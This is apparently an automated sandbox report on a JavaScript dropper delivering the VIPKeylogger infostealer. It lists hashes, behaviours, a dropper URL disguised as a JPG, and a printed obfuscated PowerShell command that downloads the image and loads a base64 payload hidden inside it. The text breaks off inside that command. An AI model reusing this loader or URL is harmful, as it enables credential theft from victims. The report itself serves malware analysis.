Analysis

  • max time kernel
    141s
  • max time network
    139s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    29/08/2024, 05:55

General

  • Target

    RFQ-MR-24-09101 SPS.js

  • Size

    615KB

  • MD5

    816e7f77445ae08cda5ad3346fa8c8ff

  • SHA1

    ecb2b271b0b22b962ce264552bc5453eff755d97

  • SHA256

    7db5b864d7dc11b7523b182bafd5c9526343bfd9d2443fb0700588754c4cd551

  • SHA512

    1924fb265dd4e5e00b9293fce18fe831e2e8e6c5437873b0c6e2b6563204540595d0bea7f74d868a39e1727d77b483b434b48e0f2fcac02c8eeef989110f3423

  • SSDEEP

    12288:RvqUGASKJa54+3wlF6vRXUlOe8QkqRH9Dx5Ofk1oeQcaSc8+L2g7UH1sEP0ZNnlX:ZFh4ILqSFq

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg

exe.dropper

https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg

Extracted

Family

vipkeylogger

Credentials

Signatures

  • VIPKeylogger

    VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe "C:\Users\Admin\AppData\Local\Temp\RFQ-MR-24-09101 SPS.js"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4092
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J⼞ ⋄ ⍃ ⨞ ❄Bp⼞ ⋄ ⍃ ⨞ ❄G0⼞ ⋄ ⍃ ⨞ ❄YQBn⼞ ⋄ ⍃ ⨞ ❄GU⼞ ⋄ ⍃ ⨞ ❄VQBy⼞ ⋄ ⍃ ⨞ ❄Gw⼞ ⋄ ⍃ ⨞ ❄I⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄9⼞ ⋄ ⍃ ⨞ ❄C⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄JwBo⼞ ⋄ ⍃ ⨞ ❄HQ⼞ ⋄ ⍃ ⨞ ❄d⼞ ⋄ ⍃ ⨞ ❄Bw⼞ ⋄ ⍃ ⨞ ❄HM⼞ ⋄ ⍃ ⨞ ❄Og⼞ ⋄ ⍃ ⨞ ❄v⼞ ⋄ ⍃ ⨞ ❄C8⼞ ⋄ ⍃ ⨞ ❄aQBh⼞ ⋄ ⍃ ⨞ ❄DY⼞ ⋄ ⍃ ⨞ ❄M⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄x⼞ ⋄ ⍃ ⨞ ❄DY⼞ ⋄ ⍃ ⨞ ❄M⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄2⼞ ⋄ ⍃ ⨞ ❄C4⼞ ⋄ ⍃ ⨞ ❄dQBz⼞ ⋄ ⍃ ⨞ ❄C4⼞ ⋄ ⍃ ⨞ ❄YQBy⼞ ⋄ ⍃ ⨞ ❄GM⼞ ⋄ ⍃ ⨞ ❄a⼞ ⋄ ⍃ ⨞ ❄Bp⼞ ⋄ ⍃ ⨞ ❄HY⼞ ⋄ ⍃ ⨞ ❄ZQ⼞ ⋄ ⍃ ⨞ ❄u⼞ ⋄ ⍃ ⨞ ❄G8⼞ ⋄ ⍃ ⨞ ❄cgBn⼞ ⋄ ⍃ ⨞ ❄C8⼞ ⋄ ⍃ ⨞ ❄MQ⼞ ⋄ ⍃ ⨞ ❄w⼞ ⋄ ⍃ ⨞ ❄C8⼞ ⋄ ⍃ ⨞ ❄aQB0⼞ ⋄ ⍃ ⨞ ❄GU⼞ ⋄ ⍃ ⨞ ❄bQBz⼞ ⋄ ⍃ ⨞ ❄C8⼞ ⋄ ⍃ ⨞ ❄Z⼞ ⋄ ⍃ ⨞ ❄Bl⼞ ⋄ ⍃ ⨞ ❄GE⼞ ⋄ ⍃ ⨞ ❄d⼞ ⋄ ⍃ ⨞ ❄Bo⼞ ⋄ ⍃ ⨞ ❄G4⼞ ⋄ ⍃ ⨞ ❄bwB0⼞ ⋄ ⍃ ⨞ ❄GU⼞ ⋄ ⍃ ⨞ ❄Xw⼞ ⋄ ⍃ ⨞ ❄y⼞ ⋄ ⍃ ⨞ ❄D⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄Mg⼞ ⋄ ⍃ ⨞ ❄0⼞ ⋄ ⍃ ⨞ ❄D⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄Nw⼞ ⋄ ⍃ ⨞ ❄v⼞ ⋄ ⍃ ⨞ ❄GQ⼞ ⋄ ⍃ ⨞ ❄ZQBh⼞ ⋄ ⍃ ⨞ ❄HQ⼞ ⋄ ⍃ ⨞ ❄a⼞ ⋄ ⍃ ⨞ ❄Bu⼞ ⋄ ⍃ ⨞ ❄G8⼞ ⋄ ⍃ ⨞ ❄d⼞ ⋄ ⍃ ⨞ ❄Bl⼞ ⋄ ⍃ ⨞ ❄C4⼞ ⋄ ⍃ ⨞ ❄agBw⼞ ⋄ ⍃ ⨞ ❄Gc⼞ ⋄ ⍃ ⨞ ❄Jw⼞ ⋄ ⍃ ⨞ ❄7⼞ ⋄ ⍃ ⨞ ❄CQ⼞ ⋄ ⍃ ⨞ ❄dwBl⼞ ⋄ ⍃ ⨞ ❄GI⼞ ⋄ ⍃ ⨞ ❄QwBs⼞ ⋄ ⍃ ⨞ ❄Gk⼞ ⋄ ⍃ ⨞ ❄ZQBu⼞ ⋄ ⍃ ⨞ ❄HQ⼞ ⋄ ⍃ ⨞ ❄I⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄9⼞ ⋄ ⍃ ⨞ ❄C⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄TgBl⼞ ⋄ ⍃ ⨞ ❄Hc⼞ ⋄ ⍃ ⨞ ❄LQBP⼞ ⋄ ⍃ ⨞ ❄GI⼞ ⋄ ⍃ ⨞ ❄agBl⼞ ⋄ ⍃ ⨞ ❄GM⼞ ⋄ ⍃ ⨞ ❄d⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄g⼞ ⋄ ⍃ ⨞ ❄FM⼞ ⋄ ⍃ ⨞ ❄eQBz⼞ ⋄ ⍃ ⨞ ❄HQ⼞ ⋄ ⍃ ⨞ ❄ZQBt⼞ ⋄ ⍃ ⨞ ❄C4⼞ ⋄ ⍃ ⨞ ❄TgBl⼞ ⋄ ⍃ ⨞ ❄HQ⼞ ⋄ ⍃ ⨞ ❄LgBX⼞ ⋄ ⍃ ⨞ ❄GU⼞ ⋄ ⍃ ⨞ ❄YgBD⼞ ⋄ ⍃ ⨞ ❄Gw⼞ ⋄ ⍃ ⨞ ❄aQBl⼞ ⋄ ⍃ ⨞ ❄G4⼞ ⋄ ⍃ ⨞ ❄d⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄7⼞ ⋄ ⍃ ⨞ ❄CQ⼞ ⋄ ⍃ ⨞ ❄aQBt⼞ ⋄ ⍃ ⨞ ❄GE⼞ ⋄ ⍃ ⨞ ❄ZwBl⼞ ⋄ ⍃ ⨞ ❄EI⼞ ⋄ ⍃ ⨞ ❄eQB0⼞ ⋄ ⍃ ⨞ ❄GU⼞ ⋄ ⍃ ⨞ ❄cw⼞ ⋄ ⍃ ⨞ ❄g⼞ ⋄ ⍃ ⨞ ❄D0⼞ ⋄ ⍃ ⨞ ❄I⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄k⼞ ⋄ ⍃ ⨞ ❄Hc⼞ ⋄ ⍃ ⨞ ❄ZQBi⼞ ⋄ ⍃ ⨞ ❄EM⼞ ⋄ ⍃ ⨞ ❄b⼞ ⋄ ⍃ ⨞ ❄Bp⼞ ⋄ ⍃ ⨞ ❄GU⼞ ⋄ ⍃ ⨞ ❄bgB0⼞ ⋄ ⍃ ⨞ ❄C4⼞ ⋄ ⍃ ⨞ ❄R⼞ ⋄ ⍃ ⨞ ❄Bv⼞ ⋄ ⍃ ⨞ ❄Hc⼞ ⋄ ⍃ ⨞ ❄bgBs⼞ ⋄ ⍃ ⨞ ❄G8⼞ ⋄ ⍃ ⨞ ❄YQBk⼞ ⋄ ⍃ ⨞ ❄EQ⼞ ⋄ ⍃ ⨞ ❄YQB0⼞ ⋄ ⍃ ⨞ ❄GE⼞ ⋄ ⍃ ⨞ ❄K⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄k⼞ ⋄ ⍃ ⨞ ❄Gk⼞ ⋄ ⍃ ⨞ ❄bQBh⼞ ⋄ ⍃ ⨞ ❄Gc⼞ ⋄ ⍃ ⨞ ❄ZQBV⼞ ⋄ ⍃ ⨞ ❄HI⼞ ⋄ ⍃ ⨞ ❄b⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄p⼞ ⋄ ⍃ ⨞ ❄Ds⼞ ⋄ ⍃ ⨞ ❄J⼞ ⋄ ⍃ ⨞ ❄Bp⼞ ⋄ ⍃ ⨞ ❄G0⼞ ⋄ ⍃ ⨞ ❄YQBn⼞ ⋄ ⍃ ⨞ ❄GU⼞ ⋄ ⍃ ⨞ ❄V⼞ ⋄ ⍃ ⨞ ❄Bl⼞ ⋄ ⍃ ⨞ ❄Hg⼞ ⋄ ⍃ ⨞ ❄d⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄g⼞ ⋄ ⍃ ⨞ ❄D0⼞ ⋄ ⍃ ⨞ ❄I⼞ ⋄ ⍃ ⨞ ❄Bb⼞ ⋄ ⍃ ⨞ ❄FM⼞ ⋄ ⍃ ⨞ ❄eQBz⼞ ⋄ ⍃ ⨞ ❄HQ⼞ ⋄ ⍃ ⨞ ❄ZQBt⼞ ⋄ ⍃ ⨞ ❄C4⼞ ⋄ ⍃ ⨞ ❄V⼞ ⋄ ⍃ ⨞ ❄Bl⼞ ⋄ ⍃ ⨞ ❄Hg⼞ ⋄ ⍃ ⨞ ❄d⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄u⼞ ⋄ ⍃ ⨞ ❄EU⼞ ⋄ ⍃ ⨞ ❄bgBj⼞ ⋄ ⍃ ⨞ ❄G8⼞ ⋄ ⍃ ⨞ ❄Z⼞ ⋄ ⍃ ⨞ ❄Bp⼞ ⋄ ⍃ ⨞ ❄G4⼞ ⋄ ⍃ ⨞ ❄ZwBd⼞ ⋄ ⍃ ⨞ ❄Do⼞ ⋄ ⍃ ⨞ ❄OgBV⼞ ⋄ ⍃ ⨞ ❄FQ⼞ ⋄ ⍃ ⨞ ❄Rg⼞ ⋄ ⍃ ⨞ ❄4⼞ ⋄ ⍃ ⨞ ❄C4⼞ ⋄ ⍃ ⨞ ❄RwBl⼞ ⋄ ⍃ ⨞ ❄HQ⼞ ⋄ ⍃ ⨞ ❄UwB0⼞ ⋄ ⍃ ⨞ ❄HI⼞ ⋄ ⍃ ⨞ ❄aQBu⼞ ⋄ ⍃ ⨞ ❄Gc⼞ ⋄ ⍃ ⨞ ❄K⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄k⼞ ⋄ ⍃ ⨞ ❄Gk⼞ ⋄ ⍃ ⨞ ❄bQBh⼞ ⋄ ⍃ ⨞ ❄Gc⼞ ⋄ ⍃ ⨞ ❄ZQBC⼞ ⋄ ⍃ ⨞ ❄Hk⼞ ⋄ ⍃ ⨞ ❄d⼞ ⋄ ⍃ ⨞ ❄Bl⼞ ⋄ ⍃ ⨞ ❄HM⼞ ⋄ ⍃ ⨞ ❄KQ⼞ ⋄ ⍃ ⨞ ❄7⼞ ⋄ ⍃ ⨞ ❄CQ⼞ ⋄ ⍃ ⨞ ❄cwB0⼞ ⋄ ⍃ ⨞ ❄GE⼞ ⋄ ⍃ ⨞ ❄cgB0⼞ ⋄ ⍃ ⨞ ❄EY⼞ ⋄ ⍃ ⨞ ❄b⼞ ⋄ ⍃ ⨞ ❄Bh⼞ ⋄ ⍃ ⨞ ❄Gc⼞ ⋄ ⍃ ⨞ ❄I⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄9⼞ ⋄ ⍃ ⨞ ❄C⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄Jw⼞ ⋄ ⍃ ⨞ ❄8⼞ ⋄ ⍃ ⨞ ❄Dw⼞ ⋄ ⍃ ⨞ ❄QgBB⼞ ⋄ ⍃ ⨞ ❄FM⼞ ⋄ ⍃ ⨞ ❄RQ⼞ ⋄ ⍃ ⨞ ❄2⼞ ⋄ ⍃ ⨞ ❄DQ⼞ ⋄ ⍃ ⨞ ❄XwBT⼞ ⋄ ⍃ ⨞ ❄FQ⼞ ⋄ ⍃ ⨞ ❄QQBS⼞ ⋄ ⍃ ⨞ ❄FQ⼞ ⋄ ⍃ ⨞ ❄Pg⼞ ⋄ ⍃ ⨞ ❄+⼞ ⋄ ⍃ ⨞ ❄Cc⼞ ⋄ ⍃ ⨞ ❄Ow⼞ ⋄ ⍃ ⨞ ❄k⼞ ⋄ ⍃ ⨞ ❄GU⼞ ⋄ ⍃ ⨞ ❄bgBk⼞ ⋄ ⍃ ⨞ ❄EY⼞ ⋄ ⍃ ⨞ ❄b⼞ ⋄ ⍃ ⨞ ❄Bh⼞ ⋄ ⍃ ⨞ ❄Gc⼞ ⋄ ⍃ ⨞ ❄I⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄9⼞ ⋄ ⍃ ⨞ ❄C⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄Jw⼞ ⋄ ⍃ ⨞ ❄8⼞ ⋄ ⍃ ⨞ ❄Dw⼞ ⋄ ⍃ ⨞ ❄QgBB⼞ ⋄ ⍃ ⨞ ❄FM⼞ ⋄ ⍃ ⨞ ❄RQ⼞ ⋄ ⍃ ⨞ ❄2⼞ ⋄ ⍃ ⨞ ❄DQ⼞ ⋄ ⍃ ⨞ ❄XwBF⼞ ⋄ ⍃ ⨞ ❄E4⼞ ⋄ ⍃ ⨞ ❄R⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄+⼞ ⋄ ⍃ ⨞ ❄D4⼞ ⋄ ⍃ ⨞ ❄Jw⼞ ⋄ ⍃ ⨞ ❄7⼞ ⋄ ⍃ ⨞ ❄CQ⼞ ⋄ ⍃ ⨞ ❄cwB0⼞ ⋄ ⍃ ⨞ ❄GE⼞ ⋄ ⍃ ⨞ ❄cgB0⼞ ⋄ ⍃ ⨞ ❄Ek⼞ ⋄ ⍃ ⨞ ❄bgBk⼞ ⋄ ⍃ ⨞ ❄GU⼞ ⋄ ⍃ ⨞ ❄e⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄g⼞ ⋄ ⍃ ⨞ ❄D0⼞ ⋄ ⍃ ⨞ ❄I⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄k⼞ ⋄ ⍃ ⨞ ❄Gk⼞ ⋄ ⍃ ⨞ ❄bQBh⼞ ⋄ ⍃ ⨞ ❄Gc⼞ ⋄ ⍃ ⨞ ❄ZQBU⼞ ⋄ ⍃ ⨞ ❄GU⼞ ⋄ ⍃ ⨞ ❄e⼞ ⋄ ⍃ ⨞ ❄B0⼞ ⋄ ⍃ ⨞ ❄C4⼞ ⋄ ⍃ ⨞ ❄SQBu⼞ ⋄ ⍃ ⨞ ❄GQ⼞ ⋄ ⍃ ⨞ ❄ZQB4⼞ ⋄ ⍃ ⨞ ❄E8⼞ ⋄ ⍃ ⨞ ❄Zg⼞ ⋄ ⍃ ⨞ ❄o⼞ ⋄ ⍃ ⨞ ❄CQ⼞ ⋄ ⍃ ⨞ ❄cwB0⼞ ⋄ ⍃ ⨞ ❄GE⼞ ⋄ ⍃ ⨞ ❄cgB0⼞ ⋄ ⍃ ⨞ ❄EY⼞ ⋄ ⍃ ⨞ ❄b⼞ ⋄ ⍃ ⨞ ❄Bh⼞ ⋄ ⍃ ⨞ ❄Gc⼞ ⋄ ⍃ ⨞ ❄KQ⼞ ⋄ ⍃ ⨞ ❄7⼞ ⋄ ⍃ ⨞ ❄CQ⼞ ⋄ ⍃ ⨞ ❄ZQBu⼞ ⋄ ⍃ ⨞ ❄GQ⼞ ⋄ ⍃ ⨞ ❄SQBu⼞ ⋄ ⍃ ⨞ ❄GQ⼞ ⋄ ⍃ ⨞ ❄ZQB4⼞ ⋄ ⍃ ⨞ ❄C⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄PQ⼞ ⋄ ⍃ ⨞ ❄g⼞ ⋄ ⍃ ⨞ ❄CQ⼞ ⋄ ⍃ ⨞ ❄aQBt⼞ ⋄ ⍃ ⨞ ❄GE⼞ ⋄ ⍃ ⨞ ❄ZwBl⼞ ⋄ ⍃ ⨞ ❄FQ⼞ ⋄ ⍃ ⨞ ❄ZQB4⼞ ⋄ ⍃ ⨞ ❄HQ⼞ ⋄ ⍃ ⨞ ❄LgBJ⼞ ⋄ ⍃ ⨞ ❄G4⼞ ⋄ ⍃ ⨞ ❄Z⼞ ⋄ ⍃ ⨞ ❄Bl⼞ ⋄ ⍃ ⨞ ❄Hg⼞ ⋄ ⍃ ⨞ ❄TwBm⼞ ⋄ ⍃ ⨞ ❄Cg⼞ ⋄ ⍃ ⨞ ❄J⼞ ⋄ ⍃ ⨞ ❄Bl⼞ ⋄ ⍃ ⨞ ❄G4⼞ ⋄ ⍃ ⨞ ❄Z⼞ ⋄ ⍃ ⨞ ❄BG⼞ ⋄ ⍃ ⨞ ❄Gw⼞ ⋄ ⍃ ⨞ ❄YQBn⼞ ⋄ ⍃ ⨞ ❄Ck⼞ ⋄ ⍃ ⨞ ❄Ow⼞ ⋄ ⍃ ⨞ ❄k⼞ ⋄ ⍃ ⨞ ❄HM⼞ ⋄ ⍃ ⨞ ❄d⼞ ⋄ ⍃ ⨞ ❄Bh⼞ ⋄ ⍃ ⨞ ❄HI⼞ ⋄ ⍃ ⨞ ❄d⼞ ⋄ ⍃ ⨞ ❄BJ⼞ ⋄ ⍃ ⨞ ❄G4⼞ ⋄ ⍃ ⨞ ❄Z⼞ ⋄ ⍃ ⨞ ❄Bl⼞ ⋄ ⍃ ⨞ ❄Hg⼞ ⋄ ⍃ ⨞ ❄I⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄t⼞ ⋄ ⍃ ⨞ ❄Gc⼞ ⋄ ⍃ ⨞ ❄ZQ⼞ ⋄ ⍃ ⨞ ❄g⼞ ⋄ ⍃ ⨞ ❄D⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄I⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄t⼞ ⋄ ⍃ ⨞ ❄GE⼞ ⋄ ⍃ ⨞ ❄bgBk⼞ ⋄ ⍃ ⨞ ❄C⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄J⼞ ⋄ ⍃ ⨞ ❄Bl⼞ ⋄ ⍃ ⨞ ❄G4⼞ ⋄ ⍃ ⨞ ❄Z⼞ ⋄ ⍃ ⨞ ❄BJ⼞ ⋄ ⍃ ⨞ ❄G4⼞ ⋄ ⍃ ⨞ ❄Z⼞ ⋄ ⍃ ⨞ ❄Bl⼞ ⋄ ⍃ ⨞ ❄Hg⼞ ⋄ ⍃ ⨞ ❄I⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄t⼞ ⋄ ⍃ ⨞ ❄Gc⼞ ⋄ ⍃ ⨞ ❄d⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄g⼞ ⋄ ⍃ ⨞ ❄CQ⼞ ⋄ ⍃ ⨞ ❄cwB0⼞ ⋄ ⍃ ⨞ ❄GE⼞ ⋄ ⍃ ⨞ ❄cgB0⼞ ⋄ ⍃ ⨞ ❄Ek⼞ ⋄ ⍃ ⨞ ❄bgBk⼞ ⋄ ⍃ ⨞ ❄GU⼞ ⋄ ⍃ ⨞ ❄e⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄7⼞ ⋄ ⍃ ⨞ ❄CQ⼞ ⋄ ⍃ ⨞ ❄cwB0⼞ ⋄ ⍃ ⨞ ❄GE⼞ ⋄ ⍃ ⨞ ❄cgB0⼞ ⋄ ⍃ ⨞ ❄Ek⼞ ⋄ ⍃ ⨞ ❄bgBk⼞ ⋄ ⍃ ⨞ ❄GU⼞ ⋄ ⍃ ⨞ ❄e⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄g⼞ ⋄ ⍃ ⨞ ❄Cs⼞ ⋄ ⍃ ⨞ ❄PQ⼞ ⋄ ⍃ ⨞ ❄g⼞ ⋄ ⍃ ⨞ ❄CQ⼞ ⋄ ⍃ ⨞ ❄cwB0⼞ ⋄ ⍃ ⨞ ❄GE⼞ ⋄ ⍃ ⨞ ❄cgB0⼞ ⋄ ⍃ ⨞ ❄EY⼞ ⋄ ⍃ ⨞ ❄b⼞ ⋄ ⍃ ⨞ ❄Bh⼞ ⋄ ⍃ ⨞ ❄Gc⼞ ⋄ ⍃ ⨞ ❄LgBM⼞ ⋄ ⍃ ⨞ ❄GU⼞ ⋄ ⍃ ⨞ ❄bgBn⼞ ⋄ ⍃ ⨞ ❄HQ⼞ ⋄ ⍃ ⨞ ❄a⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄7⼞ ⋄ ⍃ ⨞ ❄CQ⼞ ⋄ ⍃ ⨞ ❄YgBh⼞ ⋄ ⍃ ⨞ ❄HM⼞ ⋄ ⍃ ⨞ ❄ZQ⼞ ⋄ ⍃ ⨞ ❄2⼞ ⋄ ⍃ ⨞ ❄DQ⼞ ⋄ ⍃ ⨞ ❄T⼞ ⋄ ⍃ ⨞ ❄Bl⼞ ⋄ ⍃ ⨞ ❄G4⼞ ⋄ ⍃ ⨞ ❄ZwB0⼞ ⋄ ⍃ ⨞ ❄Gg⼞ ⋄ ⍃ ⨞ ❄I⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄9⼞ ⋄ ⍃ ⨞ ❄C⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄J⼞ ⋄ ⍃ ⨞ ❄Bl⼞ ⋄ ⍃ ⨞ ❄G4⼞ ⋄ ⍃ ⨞ ❄Z⼞ ⋄ ⍃ ⨞ ❄BJ⼞ ⋄ ⍃ ⨞ ❄G4⼞ ⋄ ⍃ ⨞ ❄Z⼞ ⋄ ⍃ ⨞ ❄Bl⼞ ⋄ ⍃ ⨞ ❄Hg⼞ ⋄ ⍃ ⨞ ❄I⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄t⼞ ⋄ ⍃ ⨞ ❄C⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄J⼞ ⋄ ⍃ ⨞ ❄Bz⼞ ⋄ ⍃ ⨞ ❄HQ⼞ ⋄ ⍃ ⨞ ❄YQBy⼞ ⋄ ⍃ ⨞ ❄HQ⼞ ⋄ ⍃ ⨞ ❄SQBu⼞ ⋄ ⍃ ⨞ ❄GQ⼞ ⋄ ⍃ ⨞ ❄ZQB4⼞ ⋄ ⍃ ⨞ ❄Ds⼞ ⋄ ⍃ ⨞ ❄J⼞ ⋄ ⍃ ⨞ ❄Bi⼞ ⋄ ⍃ ⨞ ❄GE⼞ ⋄ ⍃ ⨞ ❄cwBl⼞ ⋄ ⍃ ⨞ ❄DY⼞ ⋄ ⍃ ⨞ ❄N⼞ ⋄ ⍃ ⨞ ❄BD⼞ ⋄ ⍃ ⨞ ❄G8⼞ ⋄ ⍃ ⨞ ❄bQBt⼞ ⋄ ⍃ ⨞ ❄GE⼞ ⋄ ⍃ ⨞ ❄bgBk⼞ ⋄ ⍃ ⨞ ❄C⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄PQ⼞ ⋄ ⍃ ⨞ ❄g⼞ ⋄ ⍃ ⨞ ❄CQ⼞ ⋄ ⍃ ⨞ ❄aQBt⼞ ⋄ ⍃ ⨞ ❄GE⼞ ⋄ ⍃ ⨞ ❄ZwBl⼞ ⋄ ⍃ ⨞ ❄FQ⼞ ⋄ ⍃ ⨞ ❄ZQB4⼞ ⋄ ⍃ ⨞ ❄HQ⼞ ⋄ ⍃ ⨞ ❄LgBT⼞ ⋄ ⍃ ⨞ ❄HU⼞ ⋄ ⍃ ⨞ ❄YgBz⼞ ⋄ ⍃ ⨞ ❄HQ⼞ ⋄ ⍃ ⨞ ❄cgBp⼞ ⋄ ⍃ ⨞ ❄G4⼞ ⋄ ⍃ ⨞ ❄Zw⼞ ⋄ ⍃ ⨞ ❄o⼞ ⋄ ⍃ ⨞ ❄CQ⼞ ⋄ ⍃ ⨞ ❄cwB0⼞ ⋄ ⍃ ⨞ ❄GE⼞ ⋄ ⍃ ⨞ ❄cgB0⼞ ⋄ ⍃ ⨞ ❄Ek⼞ ⋄ ⍃ ⨞ ❄bgBk⼞ ⋄ ⍃ ⨞ ❄GU⼞ ⋄ ⍃ ⨞ ❄e⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄s⼞ ⋄ ⍃ ⨞ ❄C⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄J⼞ ⋄ ⍃ ⨞ ❄Bi⼞ ⋄ ⍃ ⨞ ❄GE⼞ ⋄ ⍃ ⨞ ❄cwBl⼞ ⋄ ⍃ ⨞ ❄DY⼞ ⋄ ⍃ ⨞ ❄N⼞ ⋄ ⍃ ⨞ ❄BM⼞ ⋄ ⍃ ⨞ ❄GU⼞ ⋄ ⍃ ⨞ ❄bgBn⼞ ⋄ ⍃ ⨞ ❄HQ⼞ ⋄ ⍃ ⨞ ❄a⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄p⼞ ⋄ ⍃ ⨞ ❄Ds⼞ ⋄ ⍃ ⨞ ❄J⼞ ⋄ ⍃ ⨞ ❄Bj⼞ ⋄ ⍃ ⨞ ❄G8⼞ ⋄ ⍃ ⨞ ❄bQBt⼞ ⋄ ⍃ ⨞ ❄GE⼞ ⋄ ⍃ ⨞ ❄bgBk⼞ ⋄ ⍃ ⨞ ❄EI⼞ ⋄ ⍃ ⨞ ❄eQB0⼞ ⋄ ⍃ ⨞ ❄GU⼞ ⋄ ⍃ ⨞ ❄cw⼞ ⋄ ⍃ ⨞ ❄g⼞ ⋄ ⍃ ⨞ ❄D0⼞ ⋄ ⍃ ⨞ ❄I⼞ ⋄ ⍃ ⨞ ❄Bb⼞ ⋄ ⍃ ⨞ ❄FM⼞ ⋄ ⍃ ⨞ ❄eQBz⼞ ⋄ ⍃ ⨞ ❄HQ⼞ ⋄ ⍃ ⨞ ❄ZQBt⼞ ⋄ ⍃ ⨞ ❄C4⼞ ⋄ ⍃ ⨞ ❄QwBv⼞ ⋄ ⍃ ⨞ ❄G4⼞ ⋄ ⍃ ⨞ ❄dgBl⼞ ⋄ ⍃ ⨞ ❄HI⼞ ⋄ ⍃ ⨞ ❄d⼞ ⋄ ⍃ ⨞ ❄Bd⼞ ⋄ ⍃ ⨞ ❄Do⼞ ⋄ ⍃ ⨞ ❄OgBG⼞ ⋄ ⍃ ⨞ ❄HI⼞ ⋄ ⍃ ⨞ ❄bwBt⼞ ⋄ ⍃ ⨞ ❄EI⼞ ⋄ ⍃ ⨞ ❄YQBz⼞ ⋄ ⍃ ⨞ ❄GU⼞ ⋄ ⍃ ⨞ ❄Ng⼞ ⋄ ⍃ ⨞ ❄0⼞ ⋄ ⍃ ⨞ ❄FM⼞ ⋄ ⍃ ⨞ ❄d⼞ ⋄ ⍃ ⨞ ❄By⼞ ⋄ ⍃ ⨞ ❄Gk⼞ ⋄ ⍃ ⨞ ❄bgBn⼞ 